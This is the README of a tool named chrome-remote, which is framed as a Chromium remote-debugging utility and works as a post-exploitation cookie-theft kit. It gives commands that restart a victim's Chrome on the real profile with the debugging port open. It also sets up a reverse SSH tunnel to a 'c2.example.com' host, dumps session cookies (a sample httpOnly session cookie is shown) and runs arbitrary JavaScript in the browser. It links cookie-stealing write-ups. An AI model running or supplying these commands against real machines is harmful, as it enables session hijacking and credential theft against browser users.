Utility for remote debugging of Google Chrome, Microsoft Edge and other Chromium-based browsers.
Install with pipx.
pipx install git+https://github.com/dadevel/chrome-remote.gitRestart the browser with remote debugging enabled.
Get-Process chrome | Stop-Process
Start-Process 'C:\Program Files\Google\Chrome\Application\chrome.exe' -ArgumentList '--user-data-dir="C:\Users\jdoe\AppData\Local\Google\Chrome\User Data" --restore-last-session --remote-debugging-port=9222 --remote-allow-origins=*'Then forward localhost:9222 back to your machine.
ssh.exe -R 127.0.0.1:9222:127.0.0.1:9222 proxy@c2.example.comNow you can access the browser over the remote debugging protocol and, for example, list open tabs and installed extensions.
chrome-remote list-tabs
chrome-remote list-extensionsOr dump session cookies.
❯ chrome-remote dump-cookies | jq -r '.[]|select(.domain == "example.com")'
{
"name": "sessid",
"value": "SFE0R1REZFF0NFZCVTlMbEdSTEN5QXcxZloyS0tDVDg=",
"domain": "example.com",
"path": "/",
"expires": -1,
"size": 44,
"httpOnly": true,
"secure": true,
"session": true,
"sameSite": "None",
"priority": "Medium",
"sameParty": false,
"sourceScheme": "Secure",
"sourcePort": 443
}
...Or execute arbitrary JavaScript in the remote browser.
chrome-remote eval https://example.com/ ./script.js- Stealing Chrome cookies without a password
- Post-Exploitation: Abusing Chrome's debugging feature to observe and control browsing sessions remotely
- Hands in the Cookie Jar: Dumping Cookies with Chromium’s Remote Debugger Port
- cookie_crimes
- WhiteChocolateMacademiaNut
- Debugging Cookie Dumping Failures with Chromium’s Remote Debugger and ripWCMN.py
- Chrome DevTools Protocol Documentation